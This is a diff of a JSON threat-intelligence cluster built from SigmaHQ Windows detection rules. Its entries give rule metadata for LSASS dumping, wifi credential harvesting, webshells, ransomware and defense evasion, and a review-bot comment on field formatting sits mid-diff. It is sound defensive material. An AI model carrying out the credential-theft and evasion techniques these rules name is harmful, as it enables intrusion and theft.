"proc_creation_win_susp_schtasks_delete_all.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "value": "Delete All Scheduled Tasks" + }, + { + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "meta": { + "author": "Florian Roth (rule), MSTI (query)", + 
"creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_chopper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ] + }, + "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "value": "Chopper Webshell Process Pattern" + }, + { + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "meta": { + "author": "@41thexplorer, Microsoft Defender ATP", + "creation_date": "2019/11/12", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_apt_tropictrooper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "value": "TropicTrooper Campaign November 2018" + }, + { + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI 
repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mofcomp_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", + "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", + "value": "Suspicious Mofcomp Execution" + }, + { + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "meta": { + "author": "Florian Roth, Markus Neis", + "creation_date": "2020/02/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" + ] + }, + "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb", + "value": "Winnti Malware HK University Campaign" + }, + { + "description": "Detects netsh commands that turns off the Windows firewall", + "meta": { + "author": "Fatih Sirin", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate 
administration" + ], + "filename": "proc_creation_win_susp_netsh_firewall_disable.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", + "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", + "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004", + "attack.s0108" + ] + }, + "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", + "value": "Firewall Disabled via Netsh" + }, + { + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_winrm_awl_bypass.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl" + }, + { + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_lolbin_regasm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fortiguard.com/threat-signal-report/4718?s=09", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", + "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.009" + ] + }, + "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", + "value": "Regasm/Regsvcs Suspicious Execution" + }, + { + "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "meta": { + "author": "pH-T, Nasreddine Bencherchali (update)", + "creation_date": "2022/07/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_browser_remote_debugging.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/defaultnamehere/cookie_crimes/", + "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", + "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", + "https://github.com/wunderwuzzi23/firefox-cookiemonster", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1185" + ] + }, + "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "value": "Browser Started with Remote Debugging" }, { "description": "Detect use of PDQ Deploy remote admin tool", 
@@ -44088,30 +38682,6 @@ "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", "value": "Use of PDQ Deploy Remote Adminstartion Tool" }, - { - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_persistence_typed_paths.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/dez_/status/1560101453150257154", - "https://forensafe.com/blogs/typedpaths.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", - "value": "Persistence Via TypedPaths - CommandLine" - }, { "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", "meta": { @@ -44125,8 +38695,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml" ], "tags": [ 
@@ -44137,6 +38707,257 @@ "uuid": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "value": "Pingback Backdoor" }, + { + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "meta": { + "author": "Matthew Green - @mgreen27, Florian Roth", + "creation_date": "2019/06/15", + "falsepositive": [ + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" + ], + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://attack.mitre.org/techniques/T1036/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "value": "Highly Relevant Renamed Binary" + }, + { + "description": "Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_bootconf_mod.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "value": "Modification of Boot Configuration" + }, + { + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "meta": { + "author": "Andreas Hunkeler (@Karneades), oscd.community", + "creation_date": "2020/04/20", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason" + ], + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff", + "value": "Harvesting of Wifi Credentials Using netsh.exe" + }, + { + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_schtasks_folder_combos.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "value": "Schtasks From Suspicious Folders" + }, + { + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "meta": { + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/04/09", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_sysvol_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", + "https://adsecurity.org/?p=2288", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "value": "Suspicious SYSVOL Domain Group Policy Access" + }, + { + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/21", + "falsepositive": [ + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + ], + "filename": "proc_creation_win_susp_schtasks_env_folder.yml", + "level": "high", + "logsource.category": 
"process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "81325ce1-be01-4250-944f-b4789644556f", + "value": "Suspicious Schtasks From Env Var Folder" + }, + { + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_dacl_modification_set_service.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ] + }, + "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet" + }, + { + "description": "Detects the export of a crital Registry key to a file.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation" + ], + "filename": "proc_creation_win_regedit_export_critical_keys.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ] + }, + "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", + "value": "Exports Critical Registry Keys To a File" + }, + { + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_flags_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "value": "Regsvr32 Flags Anomaly" + }, + { + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wab_unusual_parents.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "value": "Wab/Wabmig Unusual Parent Or Child Processes" + }, { "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location", "meta": { @@ -44150,8 +38971,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", "https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/", + "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml" ], "tags": [ 
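Review bot: Every entry in this hunk emits `falsepositive` as an array, but the same key is serialised as a bare string elsewhere in this patch (`"falsepositive": "No established falsepositives"` in the TropicTrooper entry earlier in the file), so the generator appears to pass the upstream Sigma value through without normalising its type; a consumer that iterates `meta.falsepositive` will iterate characters on that entry. The generator should coerce a scalar to a one-element list before serialising so the key keeps one type across the whole cluster, and the existing string entry should be regenerated the same way. Separately, `creation_date` keeps Sigma's `YYYY/MM/DD` form (`"creation_date": "2019/06/15"`) rather than an ISO 8601 date; either convert it to `2019-06-15` at generation time or state the format in the galaxy description so consumers do not mis-parse it as a locale date. The typos carried over in descriptions (`crital`, `purpouse`) are upstream rule text and are better fixed in SigmaHQ than patched here.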
@@ -44164,79 +38985,1666 @@ "value": "Executable Used by PlugX in Uncommon Location" }, { - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", "meta": { - "author": "Teymur Kheirkhabarov", - "creation_date": "2019/10/26", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/06", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml", + "filename": "proc_creation_win_install_reg_debugger_backdoor.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" + ] + }, + "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", + "value": "Suspicious Debugger Registration Cmdline" + }, + { + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "meta": { + "author": "John Lambert (rule)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_hidden_b64_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines" + }, + { + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lsass_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", + "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", + "value": "LSASS Memory Dumping" + }, + { + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "meta": { + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "creation_date": "2021/02/02", + "falsepositive": [ + "Admin activity" + ], + "filename": 
"proc_creation_win_sus_auditpol_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", + "value": "Suspicious Auditpol Usage" + }, + { + "description": "Detects usage of attrib with \"+s\" option to set suspicious script or executable as system files to hide them from users and make them unable to delete with simple rights. The rule limit the search to specific extensions and directories to avoid FP's", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_attrib_system_susp_paths.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", + "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "efec536f-72e8-4656-8960-5e85d091345b", + "value": "Set Suspicious Files as System Files Using Attrib" + }, + { + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_regedit_trustedinstaller.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": 
"windows", + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", + "value": "Regedit as Trusted Installer" + }, + { + "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", + "meta": { + "author": "Florian Roth, Tom Ueltschi", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_notpetya.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/schroedingers-petya/78870/", + "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.t1070.001", + "attack.credential_access", + "attack.t1003.001", + "car.2016-04-002" + ] + }, + "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1", + "value": "NotPetya Ransomware Activity" + }, + { + "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/09/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_frp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://asec.ahnlab.com/en/38156/", + "https://github.com/fatedier/frp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", + "value": "Fast Reverse Proxy (FRP)" + }, + { + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "meta": { + "author": "Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)", + "creation_date": "2019/06/15", + "falsepositive": [ + "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + ], + "filename": "proc_creation_win_renamed_binary.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://attack.mitre.org/techniques/T1036/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "value": "Renamed Binary" + }, + { + "description": "Detects the malicious use of a control panel item", + "meta": { + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "creation_date": "2020/06/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_control_panel_item.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1196/", + "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", + "attack.persistence", + "attack.t1546" + ] + }, + "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "value": "Control Panel Items" + }, + { + "description": "Detects execution via MSSQL xp_cmdshell stored procedure. 
Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", + "value": "Execution via MSSQL Xp_cmdshell Stored Procedure" + }, + { + "description": "Dump sam, system or security hives using REG.exe utility", + "meta": { + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. 
